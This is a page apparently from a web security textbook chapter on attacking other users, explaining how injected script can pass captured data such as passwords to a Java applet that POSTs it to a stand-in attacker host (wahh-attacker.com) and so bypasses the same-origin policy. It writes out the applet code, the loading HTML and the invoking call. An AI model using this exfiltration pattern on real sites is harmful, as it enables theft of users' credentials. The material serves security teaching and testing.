The Web Application Hacker’s Handbook Discovering and Exploiting Security Flaws


Chapter 12  ■ Attacking Other Users




Page 463




```java
import java.applet.Applet;
import java.io.DataInputStream;
import java.io.DataOutputStream;
import java.net.URL;
import java.net.URLConnection;

public class PhoneHome extends Applet   // class name assumed; this page shows only the tail of the method
{
    // Sends the supplied String to wahh-attacker.com in the body of a POST request
    public String phoneHome(String data)
    {
        try
        {
            URLConnection urlConn = new URL("http://wahh-attacker.com/").openConnection();
            urlConn.setDoOutput(true);   // enables a request body, which makes this a POST
            DataOutputStream dos = new DataOutputStream(urlConn.getOutputStream());
            dos.writeBytes(data);        // writes the low 8 bits of each character, verbatim
            dos.flush();
            dos.close();
            // Opening the input stream is what actually sends the request; the response is not used
            DataInputStream input = new DataInputStream(urlConn.getInputStream());
            input.close();
        }
        catch (Exception e)
        {
            return e.getMessage();
        }
        return "data sent";
    }
}
```

This method accepts an arbitrary String as input and generates a POST request to the attacker's server containing this data.

The attacker can cause the victim's browser to load the applet by inserting the following HTML before his malicious script (the applet is served from wahh-attacker.com; the class file name PhoneHome.class is assumed):

```html
<applet codebase="http://wahh-attacker.com/" code="PhoneHome.class" id="theApplet"></applet>
```

The applet can then be invoked from the attacker's script to issue asynchronous requests, as follows:

```javascript
theApplet.phoneHome(password);
```

Despite the various security restrictions imposed by the browser's same-origin policy, this technique is successful because:

■ HTML documents may load Java applets from any domain.
■ The applet is loaded from wahh-attacker.com and only ever communicates back to wahh-attacker.com, which is exactly what the applet sandbox permits an unsigned applet to do.
■ XMLHttpRequest is only ever used to communicate with wahh-app.com, from where the attacker's script was loaded.
■ Any JavaScript on an HTML page may invoke the public methods of any applet loaded by the page.

Current browsers no longer run Java applets, but the pattern outlived them: script executing in the vulnerable application's origin is barred from making a cross-domain XMLHttpRequest, so it hands the captured data to some component or channel that is permitted to reach the attacker's host.

